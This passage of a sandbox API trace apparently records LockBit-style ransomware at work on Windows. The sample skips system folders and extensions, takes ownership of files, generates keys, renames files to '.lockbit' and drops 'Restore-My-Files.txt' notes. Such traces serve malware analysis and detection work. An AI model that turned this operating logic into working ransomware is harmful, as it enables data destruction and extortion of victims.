(lpString1=".myd", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0083.341] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0083.341] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0083.341] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0083.341] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0083.341] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0083.341] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0083.341] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0083.341] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0083.341] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png.lockbit") returned 78 [0083.341] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\whitemenu.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.342] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.342] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.342] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.342] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.342] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.343] RtlFreeAnsiString (AnsiString="\\") [0083.343] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.343] malloc (_Size=0x200) returned 0x77d800 [0083.343] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.343] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.343] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.343] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.343] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.343] CloseHandle (hObject=0x3b8) returned 1 [0083.344] free (_Block=0x77d800) [0083.344] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\whitemenu.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.344] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.344] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.344] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=12008) returned 1 [0083.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.344] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.345] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0083.351] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.351] malloc (_Size=0xb2) returned 0x1ff1e60 [0083.351] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb2, FileInformationClass=0xa) returned 0xc0000008 [0083.351] free (_Block=0x1ff1e60) [0083.351] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\whitemenu.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0083.351] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0083.351] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.352] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700c6173, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700c6173, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e53996b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x2ee8, dwReserved0=0x0, dwReserved1=0x0, cFileName="whitemenu.png", cAlternateFileName="")) returned 0 [0083.352] FindClose (in: hFindFile=0x55fe78 | out: hFindFile=0x55fe78) returned 1 [0083.352] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x520150, dwReserved1=0x0, cFileName="Pets", cAlternateFileName="")) returned 1 [0083.352] lstrcmpiW (lpString1=".", lpString2="Pets") returned -1 [0083.352] lstrcmpiW (lpString1="..", lpString2="Pets") returned -1 [0083.352] lstrcmpiW (lpString1="Pets", lpString2="$windows.~bt") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="intel") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="msocache") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="$recycle.bin") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="$windows.~ws") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="tor browser") returned -1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="boot") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="system volume information") returned -1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="perflogs") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="google") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="application data") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="windows") returned -1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="windows.old") returned -1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="appdata") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="Windows nt") returned -1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="Msbuild") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="Microsoft") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="All users") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="mozilla") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="Microsoft.NET") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="microsoft shared") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="Internet Explorer") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="common files") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="opera") returned 1 [0083.353] lstrcmpiW (lpString1="Pets", lpString2="Windows Journal") returned -1 [0083.353] wsprintfW (in: param_1=0x3d6b928, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 49 [0083.354] wsprintfW (in: param_1=0x3d6ad00, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*") returned 51 [0083.354] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\*", fInfoLevelId=0x0, lpFindFileData=0x3d6b120, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x3d6b120) returned 0x55fe78 [0083.356] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.356] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa15a10e8, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa89306e, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa198102e, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.356] lstrcmpiW (lpString1=".", lpString2="..") returned -1 [0083.356] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.356] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72003fbd, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72003fbd, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e55fac9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x39eaa, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_INTRO_BG.wmv", cAlternateFileName="")) returned 1 [0083.356] lstrcmpiW (lpString1=".", lpString2="Notes_INTRO_BG.wmv") returned -1 [0083.356] lstrcmpiW (lpString1="..", lpString2="Notes_INTRO_BG.wmv") returned -1 [0083.356] PathFindExtensionW (pszPath="Notes_INTRO_BG.wmv") returned=".wmv" [0083.356] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0083.356] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0083.356] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0083.356] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0083.357] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0083.358] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0083.358] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Notes_INTRO_BG.wmv") returned 1 [0083.359] lstrcmpiW (lpString1="ntldr", lpString2="Notes_INTRO_BG.wmv") returned 1 [0083.359] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Notes_INTRO_BG.wmv") returned 1 [0083.359] lstrcmpiW (lpString1="bootsect.bak", lpString2="Notes_INTRO_BG.wmv") returned -1 [0083.359] lstrcmpiW (lpString1="autorun.inf", lpString2="Notes_INTRO_BG.wmv") returned -1 [0083.359] lstrcmpiW (lpString1="thumbs.db", lpString2="Notes_INTRO_BG.wmv") returned 1 [0083.359] lstrcmpiW (lpString1="iconcache.db", lpString2="Notes_INTRO_BG.wmv") returned -1 [0083.359] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0083.359] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv") returned=".wmv" [0083.359] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0083.359] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0083.359] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0083.360] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0083.361] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0083.361] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv.lockbit") returned 76 [0083.361] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.361] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.361] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.362] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.362] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.362] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.362] RtlFreeAnsiString (AnsiString="\\") [0083.362] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.362] malloc (_Size=0x200) returned 0x77d800 [0083.362] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.362] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.362] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.362] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.363] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.363] CloseHandle (hObject=0x3b8) returned 1 [0083.363] free (_Block=0x77d800) [0083.363] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_intro_bg.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.364] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.364] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.364] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=237226) returned 1 [0083.364] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.365] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.365] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.365] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.365] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.370] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.370] malloc (_Size=0xae) returned 0x1ff1e60 [0083.370] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xae, FileInformationClass=0xa) returned 0x0 [0083.413] free (_Block=0x1ff1e60) [0083.413] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_INTRO_BG.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0083.413] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0083.413] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.414] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.414] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.414] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fa30f8, nNumberOfBytesToWrite=0x472, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fa30f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0083.417] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72050277, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72050277, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e55fac9, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x3dd24, dwReserved0=0x0, dwReserved1=0x0, cFileName="Notes_INTRO_BG_PAL.wmv", cAlternateFileName="")) returned 1 [0083.417] lstrcmpiW (lpString1=".", lpString2="Notes_INTRO_BG_PAL.wmv") returned -1 [0083.417] lstrcmpiW (lpString1="..", lpString2="Notes_INTRO_BG_PAL.wmv") returned -1 [0083.417] PathFindExtensionW (pszPath="Notes_INTRO_BG_PAL.wmv") returned=".wmv" [0083.417] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0083.417] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0083.418] lstrcmpiW (lpString1=".drv", 